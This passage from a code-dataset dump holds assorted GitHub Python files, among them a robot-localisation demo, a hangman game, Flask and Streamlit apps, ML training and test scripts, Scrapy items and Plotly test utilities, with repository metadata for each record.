None:\r\n src_path = pathlib.Path.cwd().joinpath(self.model_config.model_name)\r\n else:\r\n src_path = pathlib.Path(src_dir).expanduser()\r\n\r\n if dest_dir is None:\r\n if self.model_config.install_dir is None:\r\n if verbose:\r\n print('- No destination directory provided, did not install')\r\n return None\r\n dest_path = pathlib.Path(self.model_config.install_dir).expanduser()\r\n else:\r\n dest_path = pathlib.Path(dest_dir).expanduser()\r\n\r\n if src_path.exists():\r\n if not dest_path.exists():\r\n dest_path.mkdir(parents=True)\r\n # If directory with same name as model already exists, delete\r\n if dest_path.joinpath(self.model_config.model_name).exists():\r\n if verbose:\r\n print('- Existing installation found, removing...')\r\n shutil.rmtree(dest_path.joinpath(self.model_config.model_name))\r\n shutil.move(str(src_path), str(dest_path))\r\n if verbose:\r\n print('- Installed files from source: %s to destination: %s' % (str(src_path), str(dest_path.joinpath(self.model_config.model_name))))\r\n return dest_path.joinpath(self.model_config.model_name)\r\n else:\r\n if verbose:\r\n print('- The source directory %s does not exist, did not install' % str(src_path))\r\n return None\r\n","repo_name":"MPC-Berkeley/gp-opponent-prediction-models","sub_path":"barcgp/dynamics/models/abstract_model.py","file_name":"abstract_model.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"36517554619","text":"import mq_messaging as mq\nimport random\nimport time\nimport sys\n\n\ndef main(task_channel):\n q = mq.TaskPublisher('localhost')\n while True:\n try:\n n = random.randint(1, 1000)\n print('Publishing %s with value %i' % (task_channel, n))\n q.publish_task(task_channel, str(n), timeout=10)\n time.sleep(random.random())\n except KeyboardInterrupt:\n break\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print('Please supply a task channel name.')\n sys.exit(1)\n main(sys.argv[1])\n sys.exit(0)\n","repo_name":"mjbankston/UberProject","sub_path":"Python/test_mq_messaging/repeated_task_publisher.py","file_name":"repeated_task_publisher.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8486347927","text":"from matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport math\r\n\r\n#字符串的比较函数,两个字符串相同返回1,不同返回值为0\r\ndef cmp(str1,str2):\r\n if(str1==str2):\r\n return 1\r\n else:\r\n return 0\r\n\r\n#二维数组的索引函数,功能:在q矩阵中找到元素w的位置,并作为返回值返回\r\ndef index_arr(q,w):\r\n nCol = np.size(q,1)\r\n q_max = np.max(q)\r\n v = q.flatten()\r\n n = v.tolist()\r\n a = n.index(w)\r\n i = int(math.modf(a/nCol)[1]) + 1\r\n j = a%(nCol) + 1\r\n return i,j\r\n\r\n#模拟机器人在一次运动过程中对其位置判决的概率分析\r\ndef sense(p,z,world,pSenseCorrect):\r\n nRow = np.size(p,0)\r\n nCol = np.size(p,1)\r\n q = np.zeros((nRow,nCol))\r\n for i in range(nRow):\r\n for j in range(nCol):\r\n hit = cmp(z,(world[i][j]))\r\n q[i][j]=p[i][j]*(hit * pSenseCorrect + (1-hit) * (1 - pSenseCorrect))\r\n q_sum = np.sum(q)\r\n q = q / q_sum\r\n return q\r\n\r\nworld = np.array([('red', 'green', 'green', 'red', 'red'),\r\n ('red', 'red', 'green', 'red', 'red'),\r\n ('red', 'red', 'green', 'green', 'red'),\r\n ('red', 'red', 'red', 'red', 'red')])\r\nnCol = np.size(world,1)#列数,此处与matlab对应的代码有所不同\r\nnRow = np.size(world,0)#行数,此处与matlab对应的代码有所不同\r\npSenseCorrect = 0.7\r\npStart = 0.7\r\np = np.ones((nRow,nCol))\r\np = (1 - pStart) / (nRow * nCol - 1) * 
p\r\np[2][1] = pStart\r\nprint('The Prior:')\r\nprint(p)\r\nmeasurements = np.array(['green'])\r\nq = sense(p,measurements[0],world,pSenseCorrect)\r\nprint('The probability after sensing:')\r\nprint(q)\r\nq_max = np.max(q)\r\nstr1 = 'The largest probability '+str(q_max)\r\nstr2 = 'occurs at cell'+str(index_arr(q,q_max))\r\nprint(str1,str2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"liyaochong/Mobile-Robot-Foundation","sub_path":"p10.py","file_name":"p10.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42543776185","text":"import random\r\nwords=('κιθαρα','τραπεζι','παπουτσι', 'αγγουρι', 'ρολοι', 'κουπα', 'οπτασια', 'οθονη', 'χιονι',\r\n'πατατα', 'ραδιο', 'οπλο', 'μπαλα', 'μπορα' , 'αγκυρα', 'πλοιο', 'μανικι', 'παλουκι','τσιχλα',\r\n'ριζα','ρυζι','κρικος','οραμα','λαμψη', 'αστρο','ουρανος')\r\n\r\ndef kremmala():\r\n leksi=random.choice(words)\r\n grammata=[]\r\n lathi=0\r\n print(f'Λέξη με {len(leksi)} γράμματα')\r\n print_leksi(leksi,grammata)\r\n \r\n while lathi<5 and (not leksi_in_grammata(leksi,grammata)):\r\n gramma = input (\"Δώσε γράμμα : \")\r\n if gramma not in grammata:\r\n grammata.append(gramma)\r\n if gramma not in leksi:\r\n lathi+=1\r\n print(f\"Έχεις {lathi} από 5 λάθη\")\r\n else:\r\n print_leksi(leksi,grammata)\r\n else: \r\n print(\"Το γράμμα το έχεις ξαναδώσει δώσε άλλο\")\r\n \r\n if leksi_in_grammata(leksi,grammata):\r\n print(f\"Συγχαρητήρια βρήκες τη λέξη '{leksi}'\")\r\n \r\n if lathi==5:\r\n print(\"Έχασες έκανες 5 λάθη\")\r\n print(f\"Η λέξη ήταν '{leksi}'\")\r\n play_again=input(\"Θέλεις να παίξεις ξανά (ναι/όχι): \")\r\n if play_again=='ναι':\r\n kremmala()\r\n \r\ndef print_leksi(leksi,grammata):\r\n for gramma in leksi:\r\n if gramma in grammata:\r\n print(gramma+' ', end='')\r\n else:\r\n print('_ ', end='')\r\n print('\\n')\r\n \r\ndef leksi_in_grammata(leksi,grammata):\r\n for i in leksi:\r\n if i not in grammata:\r\n return False\r\n return True\r\nkremmala()\r\n","repo_name":"k33theod/kremalla","sub_path":"kremala.py","file_name":"kremala.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73993299254","text":"# import necssary modules\nfrom st_pages import Page, show_pages\nimport streamlit.components.v1 as components\n\n# import config view\nfrom view.config import get_config\n\n# start home function\ndef start_home():\n # prepare current page config, set the page's title\n get_config(\"Home\")\n\n # open the html home page to be rendered\n render_page = open(\"view/index.html\")\n # render the html home\n components.html(render_page.read(), height = 2000)\n\n # create pages (home, machine modeling and checking)\n show_pages(\n [\n Page(\"main.py\", \"Home\", \":house:\"),\n Page(\"view/user.py\", \"Checking\", \":sound:\")\n ]\n )\n\n# code by @tudemaha","repo_name":"tudemaha/speech-emotion-classification","sub_path":"view/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40571457335","text":"import numpy as np\nimport pandas as pd\nimport os\nimport sys\n\n##### COPY__PASTE__LIB__BEGIN #####\n\nbasepath = os.path.abspath(os.path.dirname(os.path.abspath(sys.argv[0])) + '/..')\nsys.path.append(basepath)\nfrom 
edgar_playground.t4_lib import *\n\n##### COPY__PASTE__LIB__END #####\n\nINPUT_DIR = '../input'\n# INPUT_DIR = '../work/subsample_5000'\n\n# WORK_DIR= '.'\nWORK_DIR = '../work/t4'\n\n# OUTPUT_DIR = '.'\nOUTPUT_DIR = '../work/t4'\n\nTYPE_WL = ['1JHC', '2JHC', '3JHC', '1JHN', '2JHN', '3JHN', '2JHH', '3JHH']\n# TYPE_WL = ['1JHN']\n\nTARGET_WL = ['scalar_coupling_constant']\n\nSEED = 55\nnp.random.seed(SEED)\n\nN_FOLD = {\n '_': 5,\n}\n\nN_ESTIMATORS = {\n '_': 12000,\n # '1JHC': 6000,\n # '2JHC': 4000,\n # '3JHC': 6000,\n # '1JHN': 6000,\n}\n\nPARAMS = {\n '_': {\n 'num_leaves': 128,\n 'min_child_samples': 79,\n 'objective': 'regression',\n 'max_depth': 9,\n 'learning_rate': 0.2,\n \"boosting_type\": \"gbdt\",\n \"subsample_freq\": 1,\n \"subsample\": 0.9,\n \"bagging_seed\": SEED,\n \"metric\": 'mae',\n \"verbosity\": -1,\n 'reg_alpha': 0.1,\n 'reg_lambda': 0.3,\n 'colsample_bytree': 1.0\n },\n '1JHN': {'subsample': 1, 'learning_rate': 0.05},\n # '1JHN': {'subsample': 1, 'learning_rate': 0.05, 'min_child_samples': 5, 'num_leaves': 500, 'max_depth': 11},\n '2JHN': {'subsample': 1, 'learning_rate': 0.05},\n '3JHN': {'subsample': 1, 'learning_rate': 0.05},\n '1JHC': {'min_child_samples': 120},\n # '2JHC': {'min_child_samples': 500, 'learning_rate': 0.2, 'num_leaves': 500, 'max_depth': 11},\n\n}\n\n# train, test, structures, contributions = t4_load_data(INPUT_DIR)\n#\n# train, test = t4_criskiev_features(train, test, structures)\n#\n# structures = t4_merge_yukawa(INPUT_DIR, structures)\n#\n# structures = t4_crane_features(structures)\n#\n# train, test = t4_merge_structures(train, test, structures)\n#\n# t4_distance_feature(train, test)\n#\n# t4_artgor_features(train, test)\n\n#\n# Save to and/or load from parquet\n#\n# t4_to_parquet(WORK_DIR, train, test, structures, contributions)\n\ntrain, test, structures, contributions = t4_read_parquet(WORK_DIR)\n\n#\n# Load Phase 1. OOF data Mulliken charge\n#\ntrain, test = t4_load_data_mulliken_oof(WORK_DIR, train, test)\n\n#\n# Load Phase 2. 
OOF data Contributions (fc, sd, pso, dso)\n#\ntrain, test = t4_load_data_contributions_oof(WORK_DIR, train, test)\n\n# t4_criskiev_features_extra(train, test)\n\n#\n# Predict final target (Scalar coupling constant)\n#\n\n# pd.set_option('display.max_rows', 200)\n# print(train.describe().T) # Verbose=True\n# print(train.dtypes.T)\n\nX, X_test, labels = t4_prepare_columns(train, test,\n good_columns_extra=['mulliken_charge_0', 'mulliken_charge_1', 'fc', 'sd',\n 'pso', 'dso', 'contrib_sum'])\nt4_do_predict(train, test, TYPE_WL, TARGET_WL, PARAMS, N_FOLD, N_ESTIMATORS, SEED, X, X_test, labels)\n\ntrain[['id'] + [f'oof_{c}' for c in TARGET_WL]].to_csv(f'{OUTPUT_DIR}/t4c_scc_train.csv', index=False)\ntest.rename(inplace=True, columns={'oof_scalar_coupling_constant': 'scalar_coupling_constant'})\ntest[['id'] + [f'{c}' for c in TARGET_WL]].to_csv(f'{OUTPUT_DIR}/t4c_scc_test.csv', index=False)\n","repo_name":"EdgarPE/champs-scalar-coupling","sub_path":"edgar/t4c_scc.py","file_name":"t4c_scc.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35576912728","text":"# from flask import request, jsonify\nfrom flask_restful import Resource, reqparse\nfrom app.models import users\n\n\nclass User(Resource):\n def get(self, name):\n \"\"\"\n Pobiera dane usera podanego w sciezce GET\n :param name: nazwa uzytkownika\n :return: dane uzytkownika w JSON\n \"\"\"\n print(\"Get for user: {user}\".format(user=name))\n for u in users:\n if name == u[\"name\"]:\n # return jsonify(u), 200\n return u, 200\n return \"User not found\", 404\n\n def post(self, name):\n \"\"\"\n Dodaje nowego Usera podanego w sciezce URL uzupelniajac dane o age i city przekazane w JSONie POSTa\n :param name: nazwa uzytkownika\n :param age: wiek w JSON POST\n :param city: miasto w JSON POST\n :return:\n \"\"\"\n if reqparse.request.is_json:\n print(\"New user: {user} - {json}\".format(user=name, json=reqparse.request.get_json()))\n else:\n return \"Only JSON data allowed\", 400\n\n parser = reqparse.RequestParser()\n parser.add_argument(\"age\")\n parser.add_argument(\"city\")\n args = parser.parse_args()\n\n for u in users:\n if name == u[\"name\"]:\n return \"User already exists\", 400\n\n u = {\n \"name\": name,\n \"age\": args[\"age\"],\n \"city\": args[\"city\"]\n }\n users.append(u)\n return u, 201\n\n def put(self, name):\n \"\"\"\n Aktualizacja istniejacego Usera\n :param name: nazwa uzytkownika\n :param age: wiek w JSON PUT\n :param city: miasto w JSON PUT\n :return:\n \"\"\"\n\n if reqparse.request.is_json:\n print(\"Change user: {user} - {json}\".format(user=name, json=reqparse.request.get_json()))\n else:\n return \"Only JSON data allowed\", 400\n\n parser = reqparse.RequestParser()\n parser.add_argument(\"age\")\n parser.add_argument(\"city\")\n args = parser.parse_args()\n\n for u in users:\n if name == u[\"name\"]:\n u[\"age\"] = args[\"age\"]\n u[\"city\"] = args[\"city\"]\n return u, 200\n\n u = {\n \"name\": name,\n \"age\": args[\"age\"],\n \"city\": args[\"city\"]\n }\n users.append(u)\n return u, 201\n\n def delete(self, name):\n \"\"\"\n Usuniecie wskazanego usera\n :param name: nazwa uzytkownika\n :return:\n \"\"\"\n global users\n print(\"Delete for user: {user}\".format(user=name))\n users = [user for user in users if user[\"name\"] != name]\n return \"{} is deleted\".format(name), 
200\n","repo_name":"wrobelma/test_ws","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26696733237","text":"from settings.common import *\nimport django_heroku\nimport dj_database_url \n\n\nDEBUG = False\n\nALLOWED_HOSTS = ['bank-search-api.herokuapp.com']\n\nprod_db = dj_database_url.config(conn_max_age=500)\nDATABASES = {}\nDATABASES['default'] = {}\nDATABASES['default'].update(prod_db)\n\ndjango_heroku.settings(locals())","repo_name":"sudo-upmanyu/bank-search-api","sub_path":"settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22535927406","text":"# -*- coding: utf-8 -*- \n\"\"\"Created by ssfanli on 2022/03/03 \n\"\"\"\nimport time\n\nfrom screcord import record\nimport sys\nsys.path.append('.')\nfrom utils.boss import BossHelper\nfrom utils.const import PLATFORM, PACKAGE, COMMON\nfrom utils.frame import video2frame\nfrom utils.install import Installer\nfrom utils.tools import md, splice, abspath\nfrom utils.uidriver import BaseOperateAND, BaseOperateIOS\n\n\nclass YSPStart(object):\n\n def __init__(self, platform: str, device_id: str, app_path=None):\n self.plat = platform\n self.did = device_id\n self.app_path = app_path\n self.pkg_name = PACKAGE.YSP_AND if self.plat == PLATFORM.AND else PACKAGE.YSP_IOS\n self.base_dir = md(abspath(splice('../output/ysp', 'and' if self.plat == PLATFORM.AND else 'ios')))\n self.ins = Installer(self.plat, self.did)\n self.bo = None\n self.bh = None\n\n @property\n def boss_divide_id(self):\n \"\"\"get divide id\n\n ios need install and init firstly\n \"\"\"\n if self.plat == PLATFORM.AND:\n return COMMON.divide_id_mapping[self.did]\n if not self.bo:\n self.app_init()\n return self.bo.get_idfv()\n\n @property\n def app_ver(self):\n return self.ins.app_version(self.pkg_name)\n\n def download(self, which, version):\n raise NotImplementedError\n\n def install(self):\n if self.app_path:\n self.ins.install(self.app_path, self.pkg_name)\n\n def app_init(self):\n if self.plat == PLATFORM.AND:\n self.bo = BaseOperateAND(self.did, self.pkg_name)\n else:\n self.bo = BaseOperateIOS(self.did, self.pkg_name)\n\n def boss_init(self):\n \"\"\"boss_init place after in app_init\"\"\"\n self.bh = BossHelper(self.plat, self.boss_divide_id)\n\n def external_start(self):\n raise NotImplementedError\n\n def cold_start(self, repeat: int = 10, interval: int = 1):\n\n def before_test():\n self.install()\n self.app_init()\n self.boss_init()\n\n def after_test(dir_path):\n data = self.bh.get_data(page_size=repeat, keyword='app_launch_time', conversion=True)\n self.bh.save_data(splice(dir_path, f'report_data.json'), data)\n self.bh.data_analysis(data)\n\n def testing(video_fp):\n\n @video2frame(video_fp)\n @record(self.plat, self.did, video_fp, offset=(1.5, 2), pre_kill=False)\n def _start_in_ios():\n self.bo.to_click(label='央视频')\n self.bo.wait_for_appear()\n\n @video2frame(video_fp)\n @record(self.plat, self.did, video_fp, offset=(1, 0))\n def _start_in_and():\n self.bo.to_click(text='央视频')\n self.bo.wait_for_appear()\n\n if self.plat == PLATFORM.AND:\n return _start_in_and()\n return _start_in_ios()\n\n before_test()\n app_ver = self.app_ver\n video_dir = md(splice(self.base_dir, app_ver))\n for _ in range(repeat):\n self.bo.close_app()\n testing(splice(video_dir, f'cold_start_{_ 
+ 1}.mp4'))\n time.sleep(interval)\n after_test(video_dir)\n return app_ver, video_dir\n\n\nif __name__ == '__main__':\n # , '/Users/ssfanli/Desktop/YSP_v241.apk'\n ysp = YSPStart('android', 'TEV0217315000851')\n # , '/Users/ssfanli/Desktop/cctvvideo-ios_2.4.2.66007_enterprise_sign.ipa'\n # ysp = YSPStart('ios', '00008020-001D1D900CB9002E')\n ysp.cold_start(3)\n\n\n","repo_name":"Ztmr27/ysptimetest","sub_path":"case/ysp_start.py","file_name":"ysp_start.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11373142770","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfilelist = ['000000120420.jpg', '000000166287.jpg', '000000166391.jpg', '000000212559.jpg', '000000286994.jpg',\n '000000300659.jpg', '000000438862.jpg', '000000460347.jpg', '000000509735.jpg']\n\ndef unblockshaped(arr, h, w):\n \"\"\"\n Return an array of shape (h, w) where\n h * w = arr.size\n\n If arr is of shape (n, nrows, ncols), n sublocks of shape (nrows, ncols),\n then the returned array preserves the \"physical\" layout of the sublocks.\n \"\"\"\n n, nrows, ncols = arr.shape\n return (arr.reshape(h//nrows, -1, nrows, ncols)\n .swapaxes(1,2)\n .reshape(h, w))\n\ndef dct_flatten_2d(img):\n height, width, channel = img.shape\n N = int(math.sqrt(channel))\n height_resized, width_resized = height * N, width * N\n\n # Do 8x8 DCT on image (in-place)\n img = img.reshape((height, width, N, N)).reshape(-1, N, N).astype(dtype='float32')\n img_resized = unblockshaped(img, height_resized, width_resized)\n return img_resized\n\n\ndef plot_dct(img, filename):\n if filename in filelist:\n dct = dct_flatten_2d(img)\n plt.figure()\n plt.imshow(dct,cmap='gray',vmax = np.max(dct)*0.01,vmin = 0)\n plt.title( \"8x8 DCTs of the image\")\n plt.savefig(filename)","repo_name":"kaix90/DCTNet","sub_path":"segmentation/mmdet/utils/plot_dct.py","file_name":"plot_dct.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":413,"dataset":"github-code","pt":"21"} +{"seq_id":"42812090145","text":"while True:\n nome = input(\"Digite um nome: \")\n if nome == \"sair\":\n break\n aceleracao = input(\"Qual aceleração? \")\n \ndef calcula_tempo(dic):\n dicionario = {}\n for nome,aceleracao in dic.items():\n dicionario[nome] = ((200/aceleracao)**(1/2))\n return dicionario","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_196/ch78_2020_06_22_16_33_38_215597.py","file_name":"ch78_2020_06_22_16_33_38_215597.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44527914626","text":"from functools import cmp_to_key\n\ndef comparator(a,b):\n t1 = a+b\n t2 = b+a\n \n if t1 > t2:\n return 1\n elif t1 == t2:\n return 0\n else:\n return -1\n\ndef solution(numbers):\n n = [str(x) for x in numbers]\n n = sorted(n, key=cmp_to_key(comparator),reverse=True)\n answer = str(int(''.join(n)))\n return answer","repo_name":"yurrrri/swift_algorithm_programmers_and_swexpert","sub_path":"프로그래머스/lv2/42746. 
가장 큰 수/가장 큰 수.py","file_name":"가장 큰 수.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38519283153","text":"import streamlit as st\nimport pdfplumber\nimport pandas as pd\n\nst.title(\"Pdf File Converter\")\nst.subheader(\"Welcome in pdf to text converter\")\n\n\ndef extract_text(feed):\n lin = []\n lines=\"\"\n with pdfplumber.load(feed) as pdf:\n pages = pdf.pages\n for page in pdf.pages:\n text = page.extract_text()\n for line in text.split('\\n'):\n lines+=line\n lin.append(lines)\n #st.text(lin[0])\n return lin \n\nuploaded_file = st.file_uploader(\"upload pdf file\", type=None, key=None)\nif uploaded_file is not None:\n data = extract_text(uploaded_file)\n st.text(\"Below is the extracted text from PDF file\")\n stri=data[0]\n st.text(stri)\n ","repo_name":"Chirag-kumar-dev/AIChamp","sub_path":"Task4-API/first API/fapp.py","file_name":"fapp.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42191122393","text":"# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/topics/items.html\n\nfrom scrapy.item import Item, Field\n\nclass MerchItem(Item):\n merchant_url = Field()\n url = Field()\n name = Field()\n description = Field()\n inventory = Field()\n image_urls = Field()\n images = Field() # leave empty, will be auto-populated\n","repo_name":"blaisco/merch-scraper","sub_path":"merch/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73036590453","text":"import copy\nfrom numbers import Number as Num\nfrom unittest import TestCase\n\nfrom plotly import files, session, utils\n\n\nclass PlotlyTestCase(TestCase):\n\n # parent test case to assist with clean up of local credentials/config\n\n def __init__(self, *args, **kwargs):\n self._credentials = None\n self._config = None\n self._graph_reference = None\n self._session = None\n super(PlotlyTestCase, self).__init__(*args, **kwargs)\n\n @classmethod\n def setUpClass(cls):\n session._session = {\n 'credentials': {},\n 'config': {},\n 'plot_options': {}\n }\n\n def setUp(self):\n self.stash_session()\n self.stash_files()\n defaults = dict(files.FILE_CONTENT[files.CREDENTIALS_FILE],\n **files.FILE_CONTENT[files.CONFIG_FILE])\n session.sign_in(**defaults)\n\n def tearDown(self):\n self.restore_files()\n self.restore_session()\n\n def stash_files(self):\n if files.check_file_permissions():\n self._credentials = utils.load_json_dict(files.CREDENTIALS_FILE)\n self._config = utils.load_json_dict(files.CONFIG_FILE)\n\n def restore_files(self):\n if files.check_file_permissions():\n if self._credentials is not None:\n utils.save_json_dict(files.CREDENTIALS_FILE, self._credentials)\n if self._config is not None:\n utils.save_json_dict(files.CONFIG_FILE, self._config)\n\n def stash_session(self):\n self._session = copy.deepcopy(session._session)\n\n def restore_session(self):\n session._session.clear() # clear and update to preserve references.\n session._session.update(self._session)\n\n\ndef compare_dict(dict1, dict2, equivalent=True, msg='', tol=10e-8):\n for key in dict1:\n if key not in dict2:\n return (False,\n \"{0} should be {1}\".format(\n list(dict1.keys()), list(dict2.keys())))\n for key in dict1:\n if isinstance(dict1[key], dict):\n equivalent, msg = 
compare_dict(dict1[key],\n dict2[key],\n tol=tol)\n elif isinstance(dict1[key], Num) and isinstance(dict2[key], Num):\n if not comp_nums(dict1[key], dict2[key], tol):\n return False, \"['{0}'] = {1} should be {2}\".format(key,\n dict1[key],\n dict2[key])\n elif is_num_list(dict1[key]) and is_num_list(dict2[key]):\n if not comp_num_list(dict1[key], dict2[key], tol):\n return False, \"['{0}'] = {1} should be {2}\".format(key,\n dict1[key],\n dict2[key])\n elif not (dict1[key] == dict2[key]):\n return False, \"['{0}'] = {1} should be {2}\".format(key,\n dict1[key],\n dict2[key])\n if not equivalent:\n return False, \"['{0}']\".format(key) + msg\n return equivalent, msg\n\n\ndef comp_nums(num1, num2, tol=10e-8):\n return abs(num1 - num2) < tol\n\n\ndef comp_num_list(list1, list2, tol=10e-8):\n for item1, item2 in zip(list1, list2):\n if not comp_nums(item1, item2, tol):\n return False\n return True\n\n\ndef is_num_list(item):\n try:\n for thing in item:\n if not isinstance(thing, Num):\n raise TypeError\n except TypeError:\n return False\n return True\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/plotly_plotly.py/plotly.py-master/plotly/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"7542980977","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport sys\nimport numpy as np\nimport math\nimport argparse\nimport pprint\n\nimport cv2 # NOQA (Must import before importing caffe2 due to bug in cv2)\n\nfrom core.config_rel import (cfg, load_params_from_file, load_params_from_list)\nfrom modeling import model_builder_rel\nimport utils.c2\nimport utils.train\nfrom utils.timer import Timer\nfrom utils.training_stats_rel import TrainingStats\nimport utils.env as envu\nimport utils.net_rel as nu\nimport utils.metrics_rel as metrics\nfrom utils import helpers_rel\nfrom utils import checkpoints_rel\nfrom utils import evaluator_rel\n\nfrom caffe2.python import workspace\n\nimport logging\n\nFORMAT = '[%(levelname)s: %(filename)s: %(lineno)4d]: %(message)s'\nlogging.basicConfig(level=logging.INFO, format=FORMAT, stream=sys.stdout)\nlogger = logging.getLogger(__name__)\n\nutils.c2.import_contrib_ops()\nutils.c2.import_detectron_ops()\n\n# OpenCL may be enabled by default in OpenCV3; disable it because it's not\n# thread safe and causes unwanted GPU memory allocations.\ncv2.ocl.setUseOpenCL(False)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Test a network'\n )\n parser.add_argument(\n '--cfg',\n dest='cfg_file',\n help='Config file for testing (and optionally testing)',\n default=None,\n type=str\n )\n parser.add_argument(\n 'opts',\n help='See lib/core/config.py for all options',\n default=None,\n nargs=argparse.REMAINDER\n )\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n return parser.parse_args()\n\n\ndef test():\n\n test_model, output_dir, checkpoint_dir = \\\n model_builder_rel.create(cfg.MODEL.MODEL_NAME, train=False, split='test')\n logger.info('Test model built.')\n total_test_iters = int(math.ceil(\n float(len(test_model.roi_data_loader._roidb)) / float(cfg.NUM_DEVICES))) + 5\n test_evaluator = evaluator_rel.Evaluator(\n split=cfg.TEST.DATA_TYPE,\n roidb_size=len(test_model.roi_data_loader._roidb))\n test_timer = Timer()\n logger.info('Test epoch iters: 
{}'.format(total_test_iters))\n\n accumulated_accs = {}\n for key in test_evaluator.__dict__.keys():\n if key.find('acc') >= 0:\n accumulated_accs[key] = []\n # wins are for showing different plots\n wins = {}\n for key in test_evaluator.__dict__.keys():\n if key.find('acc') >= 0:\n wins[key] = None\n\n params_file = cfg.TEST.WEIGHTS\n checkpoints_rel.initialize_params_from_file(\n model=test_model, weights_file=params_file,\n num_devices=cfg.NUM_DEVICES,\n )\n test_evaluator.reset()\n print(\"=> Testing model\")\n for test_iter in range(0, total_test_iters):\n test_timer.tic()\n workspace.RunNet(test_model.net.Proto().name)\n test_timer.toc()\n test_evaluator.eval_im_dets_triplet_topk()\n logger.info('Tested {}/{} time: {}'.format(\n test_iter, total_test_iters, round(test_timer.average_time, 3)))\n iter_accs = test_evaluator.calculate_and_plot_accuracy()\n for key in iter_accs.keys():\n accumulated_accs[key].append(iter_accs[key])\n test_evaluator.save_all_dets()\n\n test_model.roi_data_loader.shutdown()\n\n logger.info('Testing has successfully finished...exiting!')\n\n\nif __name__ == '__main__':\n\n args = parse_args()\n logger.info('Called with args:')\n logger.info(args)\n if args.cfg_file is not None:\n load_params_from_file(args.cfg_file)\n if args.opts is not None:\n load_params_from_list(args.opts)\n logger.info('Testing with config:')\n logger.info(pprint.pformat(cfg))\n\n test()\n","repo_name":"facebookresearch/Large-Scale-VRD","sub_path":"tools/test_net_rel.py","file_name":"test_net_rel.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"21"} +{"seq_id":"43868654981","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\n#\n# Author: Flyaway - flyaway1217@gmail.com\n# Blog: zhouyichu.com\n#\n# Python release: 3.4.5\n#\n# Date: 2017-03-01 13:29:29\n# Last modified: 2017-03-01 19:30:02\n\n\"\"\"\nMain entrance of the dirt algorithm.\n\"\"\"\n\nimport sys\n\nfrom utils import IOManager\nfrom utils import Extractor\nfrom database import Database\nfrom similarity import Similarity\n\n\nclass DIRT:\n def __init__(self):\n self.IO = IOManager()\n self.exactor = Extractor('illegal.txt')\n\n def _construct_database(self, corpus_path):\n \"\"\"Construct the database based on the corpus.\n\n Args:\n corpus_path: str - The path of corpus.\n\n Returns:\n Database\n \"\"\"\n database = Database()\n # construct the database\n for words, poss in self.IO.read_sentences(corpus_path):\n triples = self.exactor.extract(words, poss)\n for triple in triples:\n database.insert(triple)\n\n return database\n\n def run(self, corpus_path, test_path, minfreq):\n self._database = self._construct_database(corpus_path)\n before_unique, before_total = self._stas(self._database)\n self._database.apply_minfreq(minfreq)\n after_unique, after_total = self._stas(self._database)\n sim = Similarity(self._database)\n test_phrases = self.IO.read_phrases(test_path)\n\n with open('trace.txt', 'w', encoding='utf8') as f:\n # Write the head line.\n args = [before_unique, after_unique, before_total, after_total]\n f.write('\\n')\n self._write_head(f, args)\n\n for phrase in test_phrases:\n most_similar = self._find_k_similar(phrase, sim, 5)\n self._write_result(f, phrase, most_similar)\n\n def _stas(self, database):\n \"\"\"Return the statistic of the database.\n \"\"\"\n return len(database), database.path_number()\n\n def _write_head(self, f, args):\n \"\"\"Write the head line for output.\n \"\"\"\n s = 'Found {a} distinct paths, 
